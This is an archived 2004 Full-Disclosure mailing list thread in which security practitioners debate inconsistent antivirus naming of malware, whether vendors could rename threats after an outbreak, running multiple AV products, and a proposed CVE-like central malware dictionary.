_all_ the rest of thread -- as the only person making a significant contribution who has more than half a clue about how all this stuff works, what may be technically feasible, and what a great deal of customer and industry history suggests may be acceptable, answering the same misconceptions over and over is getting tiresome...) We'll be sure to bow down to you... Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
As I explained in other of my posts in this and the related AV Naming Convention thread, in general by far the largest cost of naming disagreement is borne by the users in the early hours of large-scale outbreaks. Forget the whole naming thing...it's been bandied about before, ad nauseum, and things haven't changed. What *I* would like to see is some real analysis of what they find. Too many times, weeks after something's come out, some A/V company still has modifies/updates some Registry keys on their web site. Even Symantec lacks consistency with this...specifying Registry keys or file entries that affect Win9x vs NT+ in some writeups, but not in others. Some companies do a good job of specifying the footprints that malware leaves behind. However, none of the A/V vendors are really consistent with this. On a side note, it really would be nice for MS to publish specific information on when certain keys are loaded by the system...the bad guys seem to know this sort of thing, but educating sysadmins is difficult when MS doesn't provide any documentation. You know what, I don't work in the anti-virus field, but what you are saying is BS. There is no good reason that I can think of that the AV companies cannot rename these things after the fact. Why should they? One A/V company calls it one thing, and then puts the names used by other A/V companies in the aka section of their writeup. When an outbreak happens, they provide a fix and name it whatever they want. After the fact, they could rename things and their updates reflect the proper name. They can keep a reference to their name in the description, what's a few more characters in the signature files for every piece of malware going to matter? another 100k in a download at most? I agree that there is probably a lot of marketing pressure that may make this difficult, but there is no technical reason for it. Technical reasons, perhaps...but I think you hit the nail on the head...it's driven by $$, in some way. The AV companies cannot be that lame that they cannot handle a simple name change. I mean we use databases and other things and using these computers that should make this easy. If thay are that lame, maybe they shouldn't be in busines. Don't you think that's kind of harsh? After all, one could simply come back to you and say, well, if you can do better, why aren't you doing it? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject) Why not?
The Pentgon uses a solution that scan everything with multi-engines. We looked into getting it, but it is pretty costly. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Random Letters Sent: Friday, August 13, 2004 3:56 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] (no subject) Why not? Brad Griffin wrote: I am yet to come across a 'large' company or enterprise that uses separate brand av applications for desktop and server solutions. It makes economic and logistic sense to use one vendor for your av solution that is deployed at different levels (or layers if you prefer that terminology). About the only people I've seen use different antivirus products in one environment are home users or small businesses that misinterpret 'layers of defence' in an anti-virus context to mean 'different brands of defence'. Considering that many major av co's products are cross platform nowadays, I doubt many companies will continue using separate brand products in a mixed OS environment for much longer either. Reply: The last two companies I have worked for, one a Fortune 500 company, the other a smallish science company, both use multiple products. One uses Symantec on the Windows servers and McAfee on the Windows workstations and Clam on the Linux servers and workstations. The other uses Clam on its Linux servers and Panda on its Windows servers and workstations. Of course, that hasn't completely stopped virus outbreaks, just because there's no way that new definitions can be rolled out quickly enough. As you might expect, Windows laptops were the main culprits. But I have seen Linux viruses and breakins as well as Windows hacks too. And please don't say that the IT wasn't doing its job. As long as you have an internet presence you are a target, and none of the products are 100% secure ... Cisco anyone? So there you go. My two Euros worth. Does anyone remember the AV scanner that came with MS-DOS6? Haha --- Does HoTMaiL come with a spell checker? --- _ Use MSN Messenger to send music and pics to your friends http://www.msn.co.uk/messenger ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Todd Burroughs wrote: Before trying to explain a few items to Todd, it is clear that he is either smoking something very bad or he jumped into the middle of thread on a topic he knows nothing about and decided the rest of the world wanted his ignorant, pea-brained opinions anyway. If Todd reads all the rest of the thread that came before this and still cannot see why his post makes him appear to be a complete moron, I'll gladly try to explain it again... I can easily understand how someone unversed in the _market forces_ pertaining to antivirus software could hold that position, and as a theoretical solution to the problem of lack of cross-vendor naming coordination it has often been suggested even by though who know it would never work in the real world. Neat and tidy as such a solution seems, it will not, however, work. As I explained in other of my posts in this and the related AV Naming Convention thread, in general by far the largest cost of naming disagreement is borne by the users in the early hours of large-scale outbreaks. Thus, a solution that specifically _requires_ all vendors to use a different name until a name is agreed (no matter what this process it will take some _additional_ time) is, by design, an _anti- solution_ as such a solution, by design, ensures perfect naming inconsistency at the time the highest cost of naming inconsistency is borne. Vendors should not have to use a different name until the real one is detrermined, they should use whatever they want to. Dip-stick -- that is, as I just pointed out immediately above, precisely what happens now and is (part of) the cause of the problem that is being discussed. Please read the rest of the thread then re- read the message you think you are responding to so you actually know what is being talked about and who holds what positions. You know what, I don't work in the anti-virus field, but what you are saying is BS. ... Of course you do. And someone with well over a decade's close association with these issues, at the bleeding edge of malware naming decisions for most of his waking hours wouldn't know what he is talking about. Just like I am not a medical doctor so I must be better qualified to sort out the medical profession... ... There is no good reason that I can think of that the AV companies cannot rename these things after the fact. ... Well, fortunately for the world, you don't get to shape the solutions here... ... When an outbreak happens, they provide a fix and name it whatever they want. ... This _IS_ what happens now. _THAT_ is part of the problem. A _LARGE_ part... ... After the fact, they could rename things and their updates reflect the proper name. ... Indeed, some can and sometimes some of them do. Of course, often 3, 6, 12, 24, 48 or even 72 hours after the event (and after processing perhaps several dozen more submissions from their users) very few folk actually care any more. Yeah, yeah, there are exceptions, but the reality is that the often massive re-architecting of internal processes in some AV companies is simply not seen as worth the effort (and therefore the cost). Thus, it _will not_ happen unless the ROI factor of making such changes as will allow nimble naming and rampant re- naming change dramatically. Exceptionally few customers have ever actually changed product loyalties because of the naming mess, so there really is no compelling business case for fixing some of the chronically stupid processes that prevent staff in some AV companies from changing names at will. Now, I did not say I like this situation and I was not defending it -- if you'd the whole thread you would, in fact, realize I am one of the strongest critics of the current situation and am certainly the best informed about the topic amongst those posting. However, no matter how elegant a proposed solution is, it has to face the cold hard facts of the commercial realities, and technical realities, that will constrain its possible adoption. Thus, as much as you may not like the reasons I gave for why that proposal will not work, those reasons are some of the constraints that have prevented such ideas from already being implemented. As an outsider you cannot know this, but from watching and participating in the day-to-day workings of the AV industry for all these years now, I can tell you there hasn't yet been a vaguely original sentence in all the ideas thrown into these F-D threads on malware naming and there are established practices and reasons for why none of those ideas have been adopted and/or never will be. (This does not mean that some of the ideas might be at least half worth considering, as often the reasons for their non-acceptance are very poor, though this is NOT the case with this idea -- its downright stupid and will never fly if the objective is to make things better.) ... They can keep a reference to
Re: [Full-Disclosure] (no subject)
Harlan Carvey wrote: Forget the whole naming thing...it's been bandied about before, ad nauseum, and things haven't changed. What *I* would like to see is some real analysis of what they find. Too many times, weeks after something's come out, some A/V company still has modifies/updates some Registry keys on their web site. Even Symantec lacks consistency with this...specifying Registry keys or file entries that affect Win9x vs NT+ in some writeups, but not in others. I think the whole AV naming issue is, though problematic, the least of our problems. I think you hit the nail on the head here, Harlan. How do you enforce a unified naming schema? How would you hold them accountable for following the standard and/or listening to the standard body that does the naming? There's no way to do it that I know of that wouldn't cause all kinds of problems. Not to mention the fact that in most western countries this would almost certainly be a major legal rights issue. I'm no libertarian by any stretch of the imagination, but not allowing corporations to maintain their own naming symbols is counterproductive and problematic on many levels. What I would like to see is an organization that maintains it's own malware dictionary - including virii, trojan horses, worms, spyware, adware, exploits, etc... This organization would have a standardized naming procedure, and these standard names would be able to be cross-referenced with the aliases that the anti-virus companies utilize. The sole purpose of this organization would be to provide this information to whomever looks for it. It would not serve to force the AV vendors to do anything. Yes, this is similar to CVE. Yes, it would take a monumentous amount of work to do. :) But, it could also be a very useful resource if created properly. I can see forums for each malware branch/variant. I can see evolving analysis trees. I can see white-paper repositories on specific malware methods and ways to keep them from doing their damage. I think that the solution to this is not to try to force the companies to do what they don't want to do -- that's worse than herding cats. The key is to create a meeting-ground of sorts. This is frought with problems as well, but could be really worthwhile. Does anything like this exist at this moment? -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Barry, I think the whole AV naming issue is, though problematic, the least of our problems. I think you hit the nail on the head here, Harlan. One other thing I'd like to throw into the mix. This whole discussion is being viewed, it seems to me from the wrong perspective. The attitude that the entire A/V industry should have a common naming convention seems to be coming from the open source camp...while A/V companies aren't necessarily open source. Companies in general are about making money, and you do that through establishing and maintaining competitive advantages. Expending resources (ie, people, money, time, etc) on an endeavor to establish and maintain a common naming scheme is an expenditure that has very little (if any) ROI...it can't be justified to investors. How are A/V companies competitive? They identify and analyze malware, and update their products. Doing it faster and better than the next guy is the key. Slowing that process down to coordinate with other companies dissolves the advantage. Let's say I discover a piece of malware, and call a round table meeting...only to find out that none of the other members have discovered the malware yet. My advantage goes bye-bye. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
On Friday 13 August 2004 05:00, Brad Griffin wrote: network but located inside the dirty lab, say) they often do not _want_ to break their own concentration. I'd suggest they're not so isolated as you claim. For one thing, how do you suppose they get to hear new strains are found ? Or receive samples ? Did you take the term 'isolated' to mean locked away with no human or other contact? ...strange... Not per se. But the argument about not wanting to break concentration doesn't really fly if one is constantly interrupted by coworkers either... *virii* g What ? You prefer viruses ? virusses ? Viri ? Virea ? Virux ? ;-) No. It may not matter IF you only use one single brand of AV software. But that is NOT how it works in the real world. Companies tend to deploy multiple AV solutions on different layers so as to decrease the likelihood of some virus slipping through. And maybe even more importantly, Google research is done all the time, which doesn't work well if a strain goes by many different names. I am yet to come across a 'large' company or enterprise that uses separate brand av applications for desktop and server solutions. It makes economic and logistic sense to use one vendor for your av solution that is deployed at different levels (or layers if you prefer that terminology). About the only people I've seen use different antivirus products in one environment are home users or small businesses that misinterpret 'layers of defence' in an anti-virus context to mean 'different brands of defence'. Considering that many major av co's products are cross platform nowadays, I doubt many companies will continue using separate brand products in a mixed OS environment for much longer either. Well, whoever said 'large' companies are the only ones that matter? In my experience having multiple brands happens often. In some cases they may deploy a filtering mail gateway that's bundled with a brand X virusscanner. In other cases they may find that brand Y on the desktop offers better value than using brand Z which they equipped their exchange server with... In any case, deploying multiple brands IS a good practise, security-wise. If a buffer overflow (or a botched Datfile update) is found in one product it will probably affect their whole line of products. That's bad. Then let's consider the various timezones; using european and US AV products can sometimes give you the few hours advance that you need to avoid a disaster. If you want 4 locks on your front door, would you buy four locks of the same brand ? (or even, for paranoid people like me: would you have them all installed by the same guy ?) For me, the answer would be a resounding NO. I can't understand how the Google research is a problem with naming conventions. Google for a virus name and multiple hits come up, mostly for descriptions on a/v sites that also carry the alias names in most cases. Yes they do. But I hardly think it is LESS work for them to track all those aka names and versions to include in their description pages than it would be to standardize after the fact on one single name for the virus. Right ? My take is that so long as anti-virus developers are managing to keep their reactive model of virus detection and removal almost up to speed with the release of new malware, I don't really care if they name the next virus George or Mildred, so long as their software will identify and remove it from a system. Well, precisely. You hit the nail on the head... It happened on SO many occasions to me that the installed AV scanner did identify the virus but was unable to remove it (or it instantly came back after removal) that I had to hunt down a different (better) removal tool (rescue-CD, dedicated removal tool, or otherwise). It is at those moments that all the aliases in use for the virus bite you. Maarten -- Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
It is a very complex issue...but a simple agreement on standard post/pre-fixes would be a start. As my orginial post started, I wouldn't let it up to the AV companies at all. Have a separate entity (group of people like us), gain the backing of big compaines and other entities and come up with some standards. If AV vendors choose to work with these unset rules then they are approved by the entity. People that believe in a standradization will only used entity approved products. Let the customers decide if this is what they want. But we have to give them a way to start voicing the need. -Original Message- From: Barry Fitzgerald [mailto:[EMAIL PROTECTED] Sent: Friday, August 13, 2004 12:02 PM To: Todd Towles Cc: Harlan Carvey; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] (no subject) Todd Towles wrote: How is naming a virus with @mm or a W32 in the front slow the process down? Naming has nothing to do with AV venders making money IMO. If it does, McAfee should change its name to Norton before tries to buy it out. =) It doesn't have a direct impact -- however, you're not going to get the major companies to agree to put resources towards collaboration and changing names. That's a used resource which cuts into their profits. (Note: I'm trying to take this from their perspective, not mine.) It's a little more complex than just having prefixes and postfixes. Actually, if you look at the latest e-mail worms and their variance in variant naming between AV vendors, it's a lot more complex than standardized prefixes and whatnot. Not to mention the fact that many businesses won't do so as a matter of ego/self-reliance. -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
How is naming a virus with @mm or a W32 in the front slow the process down? Naming has nothing to do with AV venders making money IMO. If it does, McAfee should change its name to Norton before tries to buy it out. =) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Harlan Carvey Sent: Friday, August 13, 2004 9:40 AM To: [EMAIL PROTECTED] Cc: Barry Fitzgerald Subject: Re: [Full-Disclosure] (no subject) Barry, I think the whole AV naming issue is, though problematic, the least of our problems. I think you hit the nail on the head here, Harlan. One other thing I'd like to throw into the mix. This whole discussion is being viewed, it seems to me from the wrong perspective. The attitude that the entire A/V industry should have a common naming convention seems to be coming from the open source camp...while A/V companies aren't necessarily open source. Companies in general are about making money, and you do that through establishing and maintaining competitive advantages. Expending resources (ie, people, money, time, etc) on an endeavor to establish and maintain a common naming scheme is an expenditure that has very little (if any) ROI...it can't be justified to investors. How are A/V companies competitive? They identify and analyze malware, and update their products. Doing it faster and better than the next guy is the key. Slowing that process down to coordinate with other companies dissolves the advantage. Let's say I discover a piece of malware, and call a round table meeting...only to find out that none of the other members have discovered the malware yet. My advantage goes bye-bye. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Howdy Harlan, On Fri, 2004-08-13 at 09:40, Harlan Carvey wrote: The attitude that the entire A/V industry should have a common naming convention seems to be coming from the open source camp...while A/V companies aren't necessarily open source. Companies in general are about making money, and you do that through establishing and maintaining competitive advantages. What gave you the idea that this discussion started from a open source camp? But you are right in regards to the goals of the A/V companies. I think a lot of folks in this thread made is blatantly clear that A/V companies do not care about their clients or client satisfaction, they just care about their bottom line. Let's leave it at that and move on. How are A/V companies competitive? They identify and analyze malware, and update their products. Doing it faster and better than the next guy is the key. Slowing that process down to coordinate with other companies dissolves the advantage. Let's say I discover a piece of malware, and call a round table meeting...only to find out that none of the other members have discovered the malware yet. My advantage goes bye-bye. Nope, doesn't have to be. There doesn't need to be information sharing. I wouldn't even make it a round table meeting. On the risk of being ridiculed again by Nick or others, let's entertain this idea. Remove the round table and replace it with a public (or industry) bell. If an A/V company (commercial or not) finds a new virus, it rings the bell. First to ring the bell sets a name. Other companies publish with their own name *candidates* and if it turns out to be the same virus, adopt the name of the company ringing the bell. Renaming a virus on a web site and in a database and signature set a few hours later shouldn't be hard to to. But what do I know about the A/V industry anyway... I'm just making silly suggestions. No information sharing needs to take place, and competitive advantage remains. All it takes is an industry agreement to work this way. I think it will benefit their clients greatly. In closing, the A/V industry has done a good job with naming viruses in the past. However, in recent year the surge of worms has quickened the reaction of the industry. They know respond in hours, dare I say minutes, because the worm/virus/malware is spreading faster then it did before. This haste or rush to market is what caused the names to differ between vendors. And I think that through a sensible agreement, heck make it a handshake agreement, the industry can return to better more coherent naming of viruses. Regards, Frank signature.asc Description: This is a digitally signed message part
Re: [Full-Disclosure] (no subject)
On Fri, 13 Aug 2004 18:06:06 +0200, Maarten [EMAIL PROTECTED] wrote: On Friday 13 August 2004 05:00, Brad Griffin wrote: *virii* g What ? You prefer viruses ? virusses ? Viri ? Virea ? Virux ? ;-) This might be getting a touch off-topic (or at least definitely a tangent), but virii is not a word. Viruses is the correct term. http://spl.haxial.net/viruses.html http://www.nationmaster.com/encyclopedia/Plural-of-virus There's more, Google around (try virii virus language or some such set of terms). -- Kyle Maxwell [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Harlan Carvey wrote: Barry, One other thing I'd like to throw into the mix. This whole discussion is being viewed, it seems to me from the wrong perspective. The attitude that the entire A/V industry should have a common naming convention seems to be coming from the open source camp...while A/V companies aren't necessarily open source. Companies in general are about making money, and you do that through establishing and maintaining competitive advantages. Expending resources (ie, people, money, time, etc) on an endeavor to establish and maintain a common naming scheme is an expenditure that has very little (if any) ROI...it can't be justified to investors. Agreed in general - though I'm not sure if it's an open source issue specifically... I've known many Free Software/Open Source people who are opposed to being held to standards bodies and closed source people who are absolutely sticky about adherance to standards. Both perspectives have their downsides. Nonetheless, that's a nitpicking issue -- your primary point is absolutely correct: You can't enforce it; They don't want to do it (and I'm inclined to think they probably shouldn't want to do it -- it's sort of like telling someone that they have to name their kid a certain way so that others can pronounce their name); the problem must be solved some other way. How are A/V companies competitive? They identify and analyze malware, and update their products. Doing it faster and better than the next guy is the key. Slowing that process down to coordinate with other companies dissolves the advantage. Let's say I discover a piece of malware, and call a round table meeting...only to find out that none of the other members have discovered the malware yet. My advantage goes bye-bye. I think that the problem is being looked at as an industry policing issue when it's really an informational issue. By this I mean that the issue is in how the information on said malware is distributed and digested by the masses. If there were a central information repository to go to for all of the advisories and for a combined write-up, it'd reduce some of the confusion. It wouldn't cost the AV vendors a thing because it would be a seperate organization. The trick would be funding. Starting a small site is one thing, but a site of this magnitude would have to be funded somehow. Ad revenue probably wouldn't be enough for the bandwidth/equipment/man-hours to put something like this together... -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
That is the question we need to find out. But only by starting it will we ever know. Agreed? -Original Message- From: Barry Fitzgerald [mailto:[EMAIL PROTECTED] Sent: Friday, August 13, 2004 12:11 PM To: Todd Towles Cc: Mailing List - Full-Disclosure Subject: Re: [Full-Disclosure] (no subject) Todd Towles wrote: As my orginial post started, I wouldn't let it up to the AV companies at all. Have a separate entity (group of people like us), gain the backing of big compaines and other entities and come up with some standards. You don't even need big companies to approve or back you -- you just need a website and the time to put into it. It's a real need so then advertise and let the market take over. Get some community involvement. Start with things that will draw people in. The market is like gravity -- trying to force it to do something is almost impossible if you're small. What you want to do is grow your project until it can reach the critical mass where it can't be ignored. Then you use your influence to affect change. How serious are people with regard to fixing this problem? Would people put some time into a community run site that had the goal of becoming an organization pointed towards becoming a primary depot of security information? -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject) (try using a friggin subject line...)
Insert subject here ^ -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
First off: Nick, please lose that damn attitude of yours ! Further, by hammering on the endless we-have-done-it-for-many-years-so-who are-you-to-tell-us-differently part you're actually making yourself part of the problem, not part of the solution. You're saying that internal procedures make it so difficult to adapt names after the fact. When in fact the strength of a company, any company, IS to be able to adapt to changing circumstances. And if they're not able to, eventually they will go the way of the dinosaurs. The only thing Todd (and I) are trying to say is that it is possible to rename after the fact. I don't #!%$* care how many old Cobol programs need adapting for that to get possible, but the fact remains that it IS. Don't start again about how your current procedures may prevent or complicate that. Worse integration problems, by far more complex and bigger companies or conglomerates are being tackled every day. Yeah. To name a few ? How about mergers, or international intelligence-exchange between law enforcement agencies. Do you think that they let anyone stop them by complaining that database format X isn't readily compatible with format Y ? No. They fix it, they make it work together no matter what. So don't start about how impossible it is for you to rename one simple entry. To conclude, I'd like to put serious question marks by your statement that the first few hours are the all-important ones. First off, by renaming after the fact (after the first few hours/days/weeks) no-one is changing ANYTHING about those first hours so you shouldn't have ANY complaint regarding that. Secondly, a lot of the confusion only comes later. The guys that have their AV software up and running and current mostly do not suffer from the outbreaks. The problem often comes (much) later, with the people who didn't update, 'forgot to', or plain disregard any security or updates whatsoever. And then you are only called in to fix things when stuff is really breaking down. Or are you saying you've never been asked to de-toxify your parents'-, friends'- or siblings'- computers that got infested despite everything ? Everyone has. Oh and P.S.: Yes, I did read all of the threads pertaining to this. Maarten On Friday 13 August 2004 15:08, Nick FitzGerald wrote: Todd Burroughs wrote: Before trying to explain a few items to Todd, it is clear that he is either smoking something very bad or he jumped into the middle of thread on a topic he knows nothing about and decided the rest of the world wanted his ignorant, pea-brained opinions anyway. If Todd reads all the rest of the thread that came before this and still cannot see why his post makes him appear to be a complete moron, I'll gladly try to explain it again... I can easily understand how someone unversed in the _market forces_ pertaining to antivirus software could hold that position, and as a theoretical solution to the problem of lack of cross-vendor naming coordination it has often been suggested even by though who know it would never work in the real world. Neat and tidy as such a solution seems, it will not, however, work. As I explained in other of my posts in this and the related AV Naming Convention thread, in general by far the largest cost of naming disagreement is borne by the users in the early hours of large-scale outbreaks. Thus, a solution that specifically _requires_ all vendors to use a different name until a name is agreed (no matter what this process it will take some _additional_ time) is, by design, an _anti- solution_ as such a solution, by design, ensures perfect naming inconsistency at the time the highest cost of naming inconsistency is borne. Vendors should not have to use a different name until the real one is detrermined, they should use whatever they want to. Dip-stick -- that is, as I just pointed out immediately above, precisely what happens now and is (part of) the cause of the problem that is being discussed. Please read the rest of the thread then re- read the message you think you are responding to so you actually know what is being talked about and who holds what positions. You know what, I don't work in the anti-virus field, but what you are saying is BS. ... Of course you do. And someone with well over a decade's close association with these issues, at the bleeding edge of malware naming decisions for most of his waking hours wouldn't know what he is talking about. Just like I am not a medical doctor so I must be better qualified to sort out the medical profession... ... There is no good reason that I can think of that the AV companies cannot rename these things after the fact. ... Well, fortunately for the world, you don't get to shape the solutions here... ... When an outbreak happens, they provide a fix and name it whatever they want. ... This _IS_ what happens now. _THAT_ is
Re: [Full-Disclosure] (no subject)
Todd Towles wrote: How is naming a virus with @mm or a W32 in the front slow the process down? Naming has nothing to do with AV venders making money IMO. If it does, McAfee should change its name to Norton before tries to buy it out. =) It doesn't have a direct impact -- however, you're not going to get the major companies to agree to put resources towards collaboration and changing names. That's a used resource which cuts into their profits. (Note: I'm trying to take this from their perspective, not mine.) It's a little more complex than just having prefixes and postfixes. Actually, if you look at the latest e-mail worms and their variance in variant naming between AV vendors, it's a lot more complex than standardized prefixes and whatnot. Not to mention the fact that many businesses won't do so as a matter of ego/self-reliance. -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Todd Towles wrote: As my orginial post started, I wouldn't let it up to the AV companies at all. Have a separate entity (group of people like us), gain the backing of big compaines and other entities and come up with some standards. You don't even need big companies to approve or back you -- you just need a website and the time to put into it. It's a real need so then advertise and let the market take over. Get some community involvement. Start with things that will draw people in. The market is like gravity -- trying to force it to do something is almost impossible if you're small. What you want to do is grow your project until it can reach the critical mass where it can't be ignored. Then you use your influence to affect change. How serious are people with regard to fixing this problem? Would people put some time into a community run site that had the goal of becoming an organization pointed towards becoming a primary depot of security information? -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
On Fri, 13 Aug 2004 21:17:44 +0200, Maarten said: The only thing Todd (and I) are trying to say is that it is possible to rename after the fact. I don't #!%$* care how many old Cobol programs need adapting for that to get possible, but the fact remains that it IS. The question is *in fact* what ROI the companies get for modifying all that old Cobol. Possible and worth doing are two different things... Don't start again about how your current procedures may prevent or complicate that. Worse integration problems, by far more complex and bigger companies or conglomerates are being tackled every day. Yeah. To name a few ? Note that here the ROI is pretty easy - you fix the compatibility or the company goes under. How about mergers, or international intelligence-exchange between law enforcement agencies. Do you think that they let anyone stop them by complaining that database format X isn't readily compatible with format Y ? No. They fix it, they make it work together no matter what. Actually, that isn't always the case. http://www.publicintegrity.org/report.aspx?aid=332sid=100 Yes, a database so borked that copying it could break it. So don't start about how impossible it is for you to rename one simple entry. It's not a question of being *impossible*. But if it costs them US$750K to do it, and the expected return is under US$750K, why should they do it? Hell, we're talking about an industry which as a whole *continues* to keep spewing out 'We removed a virus/worm' warnings to known not-at-fault addresses - presumably the (probably very low) cost of ceasing to do so is counterbalanced by the advertising benefit of the spam. If they won't do *THAT* little thing that's *obviously* in the public interest, why should they change the way they name stuff, at probably higher cost, and less obvious benefit? pgplnbD2iHsRU.pgp Description: PGP signature
Re: [Full-Disclosure] (no subject)
On Saturday 14 August 2004 02:52, [EMAIL PROTECTED] wrote: On Fri, 13 Aug 2004 21:17:44 +0200, Maarten said: The only thing Todd (and I) are trying to say is that it is possible to rename after the fact. I don't #!%$* care how many old Cobol programs need adapting for that to get possible, but the fact remains that it IS. The question is *in fact* what ROI the companies get for modifying all that old Cobol. Possible and worth doing are two different things... Oh definitely. I do not contest that. But these posts saying not possible from a technical / logistical standpoint started to irritate me... But sure, until there is an economic reason for change, there won't be. How about mergers, or international intelligence-exchange between law enforcement agencies. Do you think that they let anyone stop them by complaining that database format X isn't readily compatible with format Y ? No. They fix it, they make it work together no matter what. Actually, that isn't always the case. http://www.publicintegrity.org/report.aspx?aid=332sid=100 Yes, a database so borked that copying it could break it. Hahaha. Great link, thanks... Although this may happen, it sounds to me like a political issue rather than a technical one. When you can retrieve data you can copy it (by however [inefficient] means is irrelevant now). Hell, we're talking about an industry which as a whole *continues* to keep spewing out 'We removed a virus/worm' warnings to known not-at-fault addresses - presumably the (probably very low) cost of ceasing to do so is counterbalanced by the advertising benefit of the spam. If they won't do *THAT* little thing that's *obviously* in the public interest, why should they change the way they name stuff, at probably higher cost, and less obvious benefit? Hear hear...! Good point. Maarten -- Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject) Why not?
If it is of interest, GFI (www.gfi.com) mail download security packages offer multiple virus engine scanning (NAI, kaspersky, bitdefender and something else), within one product. Not really that expensive, and sems to work well enough. Regards Richard -Original Message- From: [EMAIL PROTECTED] on behalf of Todd Towles Sent: Fri 13/08/2004 13:33 To: Random Letters; [EMAIL PROTECTED] Cc: Subject: RE: [Full-Disclosure] (no subject) Why not? The Pentgon uses a solution that scan everything with multi-engines. We looked into getting it, but it is pretty costly. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Random Letters Sent: Friday, August 13, 2004 3:56 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] (no subject) Why not? Brad Griffin wrote: I am yet to come across a 'large' company or enterprise that uses separate brand av applications for desktop and server solutions. It makes economic and logistic sense to use one vendor for your av solution that is deployed at different levels (or layers if you prefer that terminology). About the only people I've seen use different antivirus products in one environment are home users or small businesses that misinterpret 'layers of defence' in an anti-virus context to mean 'different brands of defence'. Considering that many major av co's products are cross platform nowadays, I doubt many companies will continue using separate brand products in a mixed OS environment for much longer either. Reply: The last two companies I have worked for, one a Fortune 500 company, the other a smallish science company, both use multiple products. One uses Symantec on the Windows servers and McAfee on the Windows workstations and Clam on the Linux servers and workstations. The other uses Clam on its Linux servers and Panda on its Windows servers and workstations. Of course, that hasn't completely stopped virus outbreaks, just because there's no way that new definitions can be rolled out quickly enough. As you might expect, Windows laptops were the main culprits. But I have seen Linux viruses and breakins as well as Windows hacks too. And please don't say that the IT wasn't doing its job. As long as you have an internet presence you are a target, and none of the products are 100% secure ... Cisco anyone? So there you go. My two Euros worth. Does anyone remember the AV scanner that came with MS-DOS6? Haha --- Does HoTMaiL come with a spell checker? --- _ Use MSN Messenger to send music and pics to your friends http://www.msn.co.uk/messenger ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
On Tuesday 10 August 2004 07:19, Nick FitzGerald wrote: The appropriately-named Frank Knobbe wrote: Isn't the complete lack of naming standardization in the AV industry simply amazing? ... However, if all AV vendors (and it would have to be all vendors or market forces would prevent it happening, so guess what is one of the largest things blocking better naming coordination?) were to agree a name perfectly before _any_ of them shipped updated detection for new viruses, it is a better than than fair bet that those same outsiders would the be ones complaining longest and loudest about how tardy AV vendors were at shipping emergency updates. There is nothing stopping AV vendors from naming freshly discovered virii with an internal naming scheme (VENDOR-MMDDHHxy) pending a central database / organisation to name the virus. Then all vendors can rename the new strain from their generic temporary name to the definitive name. This is trivial, they update virus definitions all the time, why not also update the name. This could even be good for competition; the central authority could give credit to the first discoverer by naming the virus after the vendor who first found it (but I digress here). In the real world, things are very often named after their discoverers or inventors. Star systems, diseases, laws, etcetera. Of course, the first thing is to form that central authority, but then again lots of industries have a central authority -whether decreed by law or not- so it's not something deemed impossible. At least there are no technical barriers to stop that, only political ones. Despite the high rate of development as you outline below. Using a temporary name is quite simple to do, simple to update and overall better for everyone. Maarten ... Imagine that were the case in science, particular medicine... Or perhaps it would be better to imagine that you made a more meaningful analogy, such as asking how well you think medicine would do in maintaining naming consistency if entirely new strains and variants of viruses and pathological bacteria appeared world-wide at the rate computer malware proliferates. A little exercise of the grey cells will likely suggest that they are unlikely to do better in the short term (i.e. during the outbreak phase), but would probably do much better longer-term as the dieseases, outbreaks and treatments of biological malware tend to last _MUCH_ longer than their computer cousins. If there was much oingoing need to coordinate names I think the AV industry would do better than it does now, but with the rate at which new variants appear being what it is, medium-term renaming and name coordination are both problematic and (generally) seen as having very little, if any, market value, so few people expend much effort on such renaming. -- Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
